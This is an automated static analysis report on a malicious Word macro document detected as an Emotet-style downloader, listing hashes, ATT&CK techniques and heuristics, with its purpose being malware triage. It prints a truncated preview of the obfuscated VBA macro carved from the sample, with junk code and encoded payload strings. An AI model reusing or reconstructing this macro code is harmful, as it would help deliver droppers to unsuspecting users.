Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b0d7a4a572cfab28…

MALICIOUS

Office (OLE)

178.5 KB Created: 2018-03-22 12:18:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: af17a4477a6d06d0abf910e17bf49ee3 SHA-1: 4c56dd522ba167d38d217e3479f45b7bc4a45dab SHA-256: b0d7a4a572cfab28ccd34a58171f189c4f2d8315e09a2605af3d0d6e17840004
Risk Score: 244

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, indicated by multiple OLE_VBA_ heuristics. The presence of an AutoOpen macro and CreateObject calls suggests an attempt to automatically execute code upon opening. The ClamAV detection and heuristic firings strongly indicate downloader or dropper functionality, likely attempting to fetch a second-stage payload. No specific family could be identified.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 48458 bytes
SHA-256: 4a195440b8a220f1ab4abe7a7abbd607436f4f5ec8445b6744d1a46207f3e754
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 26 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DkWAjXPsdIWW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BIuLWlzGZH"
Function JJmApmWd()
On Error Resume Next
Select Case wnNEpk
         Case 77228
            RTwbU = Hex(3971 - CSng(90033) - 3932 + ChrW(OsoJaq))
            pmkNjJ = kkoDrH
End Select
sBiDBH = vwGiu("G3qAZgBhAGMAZQA3ADAAYwBmAGEAYwAzAGQAMwA4AGIANgAxADYANAA2AGEAOQA5ADUAYgBjAGQAYQBlADAAOAAyADUAYwBkADkAOAA1AGYAYQBkADIAOAA4ADgAOAA1ADAAOQBiAGEANgBlAGUAMQAzADcAMgA5ADcAMgBjADYAMjzhHBc", 4, 170)
Select Case Flnzl
         Case 47948
            idNbkC = Hex(57033 - CSng(6551) - 10372 + ChrW(VwiODz))
            nHmNqf = DuWJHB
End Select
Select Case HJWUdE
         Case 72295
            TwQXHN = Hex(51435 - CSng(27645) - 52715 + ChrW(zrfkU))
            jZzvjI = sSizL
End Select
wNitQqJppb = vwGiu("ZIAzADAAMgBlAGEAZABiADIANwBlAGYAMQAwAGQANgA5AGMAZABhADMAMwBlADYAOQBkADUANAA0ADgAZQA0ADcAMgAxADEAZQBiADUAMAAyADUAYgA3ADcANgAxAGMAYQA5AGYAMQBlAGYANwAxAGIANABhADMAOAA2AGQAOABjADIAOQA0Aka.K", 3, 179)
Select Case jhazu
         Case 81988
            wlSVK = Hex(25308 - CSng(90548) - 60405 + ChrW(JOXpt))
            DEqtKi = EdOPv
End Select
Select Case LziuDi
         Case 68284
            blaVCu = Hex(96635 - CSng(65143) - 76499 + ChrW(uQsFhd))
            QSjFK = cpzLE
End Select
HtjFID = vwGiu("FQA1AGQAZJJj7G", 2, 8)
Select Case IfFdJj
         Case 54231
            AmJOKz = Hex(17462 - CSng(83114) - 62691 + ChrW(GQEpmL))
            VRjwf = jtGfC
End Select
Select Case MLJjzj
         Case 92905
            UFzGk = Hex(36746 - CSng(48357) - 3408 + ChrW(ANVjk))
            wdISG = idYFKk
End Select
IbYzR = vwGiu("IOSADUAj7", 5, 3)
Select Case zMmOli
         Case 41793
            rciRwb = Hex(59406 - CSng(66328) - 45013 + ChrW(RcCMC))
            NpnqcZ = aibBN
End Select
Select Case NjIknP
         Case 15625
            itJXHp = Hex(20691 - CSng(26643) - 3671 + ChrW(wQfaT))
            mstKHG = THjTiv
End Select
IjBPmINniM = vwGiu("rA@ADMANABlAGMAMABkAGEANgA1AGMAMwAwADEANQBjAGMAtfG9", 4, 44)
Select Case LXusdt
         Case 33852
            LzRUY = Hex(9127 - CSng(99745) - 17011 + ChrW(mMhwu))
            ziXzp = aVcST
End Select
Select Case VCbuPP
         Case 79259
            Wcmjw = Hex(40871 - CSng(92808) - 97532 + ChrW(AwIrT))
            EwKMI = FTwVQO
End Select
zLAFEMILG = vwGiu("a1zMwA3ADMAYwA1AGQANwAxADYANAA2ADgAOQA1AGMAYwA0ADkAOQAzADQAMAA5AGIANgBiADYAYgBkAGEANQA2ADYAMAA1ADEAOQAxAGQAYgBkAGIAMwBlAGUAMgA5ADIAZQBjAGQAOAAxADgAMgAwADIAMgBmADEANQBjADkAOAA0ADMAMQAyADYANQBjADEAYwA5AT0oTd", 4, 197)
Select Case wiMbob
         Case 49073
            iVoHC = Hex(92585 - CSng(93153) - 78435 + ChrW(bwBlXv))
            ChiQJ = NjGDAk
End Select
Select Case fwAjMo
         Case 91174
            EWJSW = Hex(92931 - CSng(22076) - 44906 + ChrW(ZzUuV))
            KAwhY = aAlJXj
End Select
qrijbA = vwGiu("lzdn8Ckri", 2, 1)
Select Case jGPfT
         Case 92571
            NoMPp = Hex(54390 - CSng(63974) - 38876 + ChrW(TEjKfq))
            PGWSiW = IzQnn
End Select
Select Case YiRKW
         Case 35543
            UKzHit = Hex(99372 - CSng(13660) - 63285 + ChrW(zOuQP))
            SuSzs = oCBPf
End Select
TvcQwZ = vwGiu("mTFgBiADcAZgA4ADEAYQBkADgAZgBkADEANQA0ADkANABlAGEANQA1ADEAOQBlAGEAZQA1AGEAMgBmADMANgA4ADEAMgA2AGUAOAAxADYAMwA5ADkAMwAzADYAOAAyAGQAMgBjADkAYgBiAGYAMgBkAGYAYwBiADQAZQBlADUAYwA2ADkAYgAzAFY@iX5", 4, 180)
Select Case ksiiB
         Case 92968
            ulJpNO = Hex(47491 - CSng(55366) - 15466 + ChrW(skzIc))
            QDVHIV = GOOdWo
End Select
Select Case huAJj
         Case 87052
            rRUms = Hex(48921 - CSng(99389) - 281 + ChrW(jrbjhr))
            WdpjVq = qOsBEl
End Select
LUCuCpj = vwGiu("4E.PvGMAOAAyAGUANQA4ADkANABmADYANABlADQAZQA5ADUAZAA4ADcANQAwADYAYQBmADQAYwBjADcAYwBlADQAMgA5ADgAMAA0ADEAZgAwA8B",
... (truncated)